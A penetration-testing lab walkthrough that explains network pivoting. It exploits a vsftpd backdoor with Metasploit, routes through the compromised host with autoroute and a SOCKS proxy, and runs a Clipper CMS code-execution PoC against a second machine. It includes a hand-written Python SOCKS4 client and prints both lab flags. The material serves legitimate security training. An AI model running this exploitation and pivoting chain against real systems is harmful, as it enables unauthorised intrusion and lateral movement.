Network Pivoting using Metasploit and Proxychains

Nishant Sharma
Pentester Academy Blog
5 min read, Aug 5, 2020


In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!

Network pivoting refers to the process of using a compromised machine that is connected to multiple networks to reach machines on the other networks. It comes in handy when the attacker wants to target hosts on a subnet that is not directly reachable from the attacking machine.

Lab Scenario

We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.

Lab: Pivoting IV

This lab comprises a Kali machine and two target machines present on two different networks. The user or practitioner will get command-line interface (CLI) access to the Kali machine, through the web browser.

Challenge Statement

In this pivoting challenge, the network architecture is as shown below:

Kali ---> Target A ---> Target B

Objective: Your mission is to get the flags kept in flagX.txt file on both Target A and Target B.

Solution

Step 1: Check the IP address of our Kali machine. From the information given in the challenge description, target A should be located at 192.28.52.3.

Command: ip addr

Step 2: Scan target A with Nmap's banner-grab script. From the output, it is clear that vsftpd and SSH services are running on the machine.

Command: nmap -sV --script=banner 192.28.52.3

Step 3: Start Metasploit and use the vsftpd backdoor exploit. When the exploit fires, a command shell session is established.

Commands:

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.28.52.3

exploit

Step 4: This session can be used to find and retrieve the flag hidden on this machine. Quote the pattern so the shell does not expand it locally, and discard permission errors.

Command: find / -name "flag*" 2>/dev/null

Step 5: Read the flag. Then check the IP address information of target A (for example with ip addr, as in Step 1) to identify its second network interface; the subnet on that interface is the one we will pivot into.

Command: cat /usr/bin/flag1.txt

Flag 1: 6d026e8a09c93a18eca404b834c13991

Step 6: Spawn a meterpreter session by upgrading the current shell session (session 1). The upgraded meterpreter session gets the next free ID, here session 2; confirm the ID with the sessions command before using it in later modules.

Command: sessions -u 1

Step 7: All open sessions can be listed by using sessions command.

Command: sessions

Step 8: Use the autoroute module to add a route through the meterpreter session for the other network, i.e. 192.72.180.0 (NETMASK defaults to 255.255.255.0, so this covers 192.72.180.0/24). From now on, any Metasploit module targeting that subnet is tunnelled through target A.

Commands:

use post/multi/manage/autoroute

set SUBNET 192.72.180.0

set SESSION 2

exploit

Step 9: To use external tools like Nmap through the pivot, start a SOCKS proxy with the auxiliary/server/socks4a module; it listens on Kali and forwards connections over the Metasploit route. Change the default SRVPORT (1080) to match the default port in proxychains' configuration, i.e. 9050. On newer Metasploit releases the socks4a and socks5 modules were merged into auxiliary/server/socks_proxy, where you select the protocol with set VERSION 4a; the remaining options are the same.

Commands:

use auxiliary/server/socks4a

show options

set SRVPORT 9050

exploit

Step 10: Use netstat command to verify that the proxy is running.

Command: netstat -tpln

Step 11: Scan the target B machine using Nmap over proxychains. No configuration change is needed because proxychains uses a SOCKS4 proxy on 127.0.0.1:9050 by default. A SOCKS proxy only relays full TCP connections, so ICMP host discovery and SYN (half-open) scans cannot work through it: use a TCP connect scan (-sT) and skip host discovery (-Pn). Expect the scan to be slow; restrict the port list if needed.

Command: proxychains nmap -sT -Pn 192.72.180.3

Step 12: The target B is running HTTP and MySQL services. Check/identify the web app by doing a curl request over proxychains.

Command: proxychains curl http://192.72.180.3
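To make Steps 9 to 12 less of a black box, the following added example (not part of the original walkthrough and not Metasploit's or proxychains' code) performs by hand what proxychains does for every outgoing TCP connection: it opens a connection to the SOCKS server, sends a SOCKS4 CONNECT request for the destination, checks the 8-byte reply and then speaks plain HTTP over the tunnelled socket, the same thing the proxychains curl command above does. It assumes the Metasploit SOCKS server is listening on 127.0.0.1:9050 and that target B is 192.72.180.3; the hostname target-b.lab used to show the SOCKS4a (remote DNS) form is constructed for illustration.

```python
"""SOCKS4/SOCKS4a CONNECT by hand: what proxychains does per TCP connection."""
from __future__ import annotations

import ipaddress
import socket
import struct

SOCKS4_VERSION = 4
CMD_CONNECT = 1
REPLY_GRANTED = 0x5A  # decimal 90
REPLY_CODES = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: client identd not reachable",
    0x5D: "rejected: identd user-id mismatch",
}


def build_socks4_connect(dst: str, dst_port: int, userid: str = "") -> bytes:
    """Build a SOCKS4 CONNECT request: VN CD DSTPORT DSTIP USERID\\0 [HOST\\0].

    If dst is an IPv4 literal it goes into DSTIP (plain SOCKS4). Otherwise the
    SOCKS4a extension is used: DSTIP is the invalid address 0.0.0.1 and the
    hostname follows USERID, so the proxy (Metasploit, on the pivot side)
    resolves the name instead of the client. proxychains does the same when
    proxy_dns is enabled.
    """
    if not 0 < dst_port < 65536:
        raise ValueError("port out of range")
    try:
        packed = ipaddress.IPv4Address(dst).packed
        trailer = b""
    except ipaddress.AddressValueError:
        packed = b"\x00\x00\x00\x01"
        trailer = dst.encode("idna") + b"\x00"
    header = struct.pack("!BBH", SOCKS4_VERSION, CMD_CONNECT, dst_port)
    return header + packed + userid.encode("ascii") + b"\x00" + trailer


def parse_socks4_reply(reply: bytes) -> tuple[bool, str]:
    """Parse the fixed 8-byte reply: VN(=0) CD DSTPORT DSTIP."""
    if len(reply) != 8:
        raise ValueError(f"short or oversized reply: {reply!r}")
    vn, cd, _port = struct.unpack("!BBH", reply[:4])
    if vn != 0:
        raise ValueError(f"unexpected reply version {vn}")
    return cd == REPLY_GRANTED, REPLY_CODES.get(cd, f"unknown code {cd}")


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def socks4_connect(proxy_host: str, proxy_port: int, dst: str, dst_port: int,
                   timeout: float = 10.0) -> socket.socket:
    """Return a socket that is connected to dst:dst_port through the proxy."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        sock.sendall(build_socks4_connect(dst, dst_port))
        ok, reason = parse_socks4_reply(_recv_exact(sock, 8))
        if not ok:
            raise ConnectionError(f"proxy refused CONNECT {dst}:{dst_port}: {reason}")
        return sock
    except Exception:
        sock.close()
        raise


def http_get_via_socks4(proxy_host: str, proxy_port: int, dst: str,
                        dst_port: int = 80, path: str = "/") -> str:
    """Equivalent of 'proxychains curl http://<dst><path>' using HTTP/1.0."""
    with socks4_connect(proxy_host, proxy_port, dst, dst_port) as sock:
        req = f"GET {path} HTTP/1.0\r\nHost: {dst}\r\nConnection: close\r\n\r\n"
        sock.sendall(req.encode("ascii"))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    import sys
    # Assumed lab layout: Metasploit SOCKS server on 127.0.0.1:9050, target B
    # at 192.72.180.3 (override with the first argument).
    target = sys.argv[1] if len(sys.argv) > 1 else "192.72.180.3"
    print(http_get_via_socks4("127.0.0.1", 9050, target)[:1000])
```

Because the protocol only has CONNECT (and BIND) commands for TCP, nothing in this exchange can carry ICMP echo requests or raw SYN packets; that is exactly why the Nmap scan in Step 11 needs -sT and -Pn, and why UDP services on target B stay invisible through this kind of pivot.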

Step 13: The web app running on target B is Clipper CMS. A search for Clipper CMS exploits quickly turns up a code-execution exploit with a Python proof-of-concept that can be used against target B.

Step 14: Save the Python PoC code in a file and run it through proxychains, since the script itself connects to target B from Kali. It requires three parameters: the Clipper URL, the admin username, and the password.

Commands:

proxychains python exploit.py http://192.72.180.3/clipper/ admin password

whoami

Step 15: Once we get a console on target B, we can search for and retrieve the flag. As before, quote the pattern so it is passed to find unchanged.

Command: find / -name "*flag*" 2>/dev/null

Command: cat /tmp/flag.txt

Flag 2: dbaa3f9b469d1315486ca82d6aa300b7

Go beyond walkthroughs with hands-on practice. Subscribe now and gain access to 2000+ lab exercises including this one! We also provide on-demand bootcamps — follow along with instructors as they go through the labs and progressively master in-demand topics regardless of time zone!

